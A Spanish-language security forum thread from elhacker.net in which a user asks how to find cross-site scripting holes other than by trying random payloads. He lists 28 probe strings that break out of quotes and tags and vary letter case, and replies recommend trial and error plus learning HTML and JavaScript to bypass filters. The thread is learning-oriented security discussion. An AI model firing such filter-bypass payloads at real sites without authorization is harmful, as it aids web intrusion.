elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Doble factor de autenticación o verificación en dos pasos


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  La única forma de encontrar XSS es probando ataques aleatorios?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: La única forma de encontrar XSS es probando ataques aleatorios?  (Leído 1,449 veces)
elJuancho

Desconectado Desconectado

Mensajes: 3


Ver Perfil
La única forma de encontrar XSS es probando ataques aleatorios?
« en: 17 Diciembre 2015, 07:05 »

Buenas! Hay una duda que siempre tuve desde que arranque a leer artículos sobre XSS, todos muy informativos lo que quieran, pero en ningúno encontré explicaciones para saber como localizarlos... Es decir, hasta donde yo se el ataque XSS depende por completo de la parte PHP que se ejecuta en el servidor, si de alguna manera se pudiera leer el PHP que se ejecuta en el server, sería facil de saber como escaparse de los bloques.... Pero... En la vida real, qué tecnicas usan para encontrarlo? Hasta ahora la única forma que se es probando muchos ataques aleatoriamente como pueden ser éstos:

Código
  1. "><script>alert("XSS")</script>
  2. "><script>alert(String.fromCharCode(88,83,83))</script>
  3. '><script>alert("XSS")</script>
  4. '><script>alert(String.fromCharCode(88,83,83))</script>
  5. <ScRIPt>aLeRT("XSS")</ScRIPt>
  6. <ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
  7. "><ScRIPt>aLeRT("XSS")</ScRIPt>
  8. "><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
  9. '><ScRIPt>aLeRT("XSS")</ScRIPt>
  10. '><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
  11. </script><script>alert("XSS")</script>
  12. </script><script>alert(String.fromCharCode(88,83,83))</script>
  13. "/><script>alert("XSS")</script>
  14. "/><script>alert(String.fromCharCode(88,83,83))</script>
  15. '/><script>alert("XSS")</script>
  16. '/><script>alert(String.fromCharCode(88,83,83))</script>
  17. </SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
  18. </SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83))
  19. </SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
  20. </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  21. ";alert("XSS");"
  22. ";alert(String.fromCharCode(88,83,83));"
  23. ';alert("XSS");'
  24. ';alert(String.fromCharCode(88,83,83));'
  25. ";alert("XSS")
  26. ";alert(String.fromCharCode(88,83,83))
  27. ';alert("XSS")
  28. ';alert(String.fromCharCode(88,83,83))

O usando algún programa que pruebe éstos ataques aleatoriamente por uno, como ser el XXSer por ejemplo.... Me gustaría que me dijeran qué técnicas usan ustedes para encontrarlos, si hay alguna forma más "inteligente" que simplemente probando ataques aleatoriamente... Y de paso si tienen algún pdf o cualquier clase de material que me ayuda a entender ésto y pueden aportarlo, sería muuuy bienvenido... Saludos y muchas gracias desde ya!
En línea

Shell Root
Colaborador
***
Desconectado Desconectado

Mensajes: 3.846



Ver Perfil WWW
Re: La única forma de encontrar XSS es probando ataques aleatorios?
« Respuesta #1 en: 19 Diciembre 2015, 16:02 »

Al hacer un análisis sin el código fuente, se requiere siempre prueba y error, es decir: realizas un xss y miras el resultado, ves que caracteres son filtrados y empiezas a organizar el vector de ataque.
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
elJuancho

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: La única forma de encontrar XSS es probando ataques aleatorios?
« Respuesta #2 en: 20 Diciembre 2015, 07:20 »

Genial shell Root! Me voy a poner a investigar más sobre los distintos tipos de filtrado de XSS... Muchas gracias y saludos!!!
En línea

WHK
吴阿卡
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.816


The Hacktivism is not a crime


Ver Perfil WWW
Re: La única forma de encontrar XSS es probando ataques aleatorios?
« Respuesta #3 en: 12 Enero 2016, 19:54 »

Te recomiendo que comiences por aprender bastante sobre html y javascript, con eso tendras suficiente parasaber sacarle provecho a los xss y como saltar filtros.

Prueba el warzone: http://warzone.elhacker.net/
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Restablecer Contraseña De Hotmail o MsN"Es la unica Forma" « 1 2 3 »
Chats; IRC y Messengers
Crackptus^^ 23 62,884 Último mensaje 29 Diciembre 2004, 15:59
por Libransser
De que forma podría saltar la contraseña de 1 única cuenta?
Seguridad
Antoine 1 821 Último mensaje 5 Mayo 2005, 03:08
por Crackptus^^
La única forma de hackear « 1 2 »
Foro Libre
Achernar 16 4,157 Último mensaje 19 Agosto 2007, 23:42
por Achernar
[C++][Opiniones] Qué os parece esta forma de generar números aleatorios? « 1 2 3 4 »
Programación C/C++
anonimo12121 38 9,056 Último mensaje 3 Abril 2012, 12:04
por anonimo12121
Cómo encontrar y eliminar virus de forma manual
Noticias
wolfbcn 0 1,077 Último mensaje 28 Diciembre 2014, 14:13
por wolfbcn
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines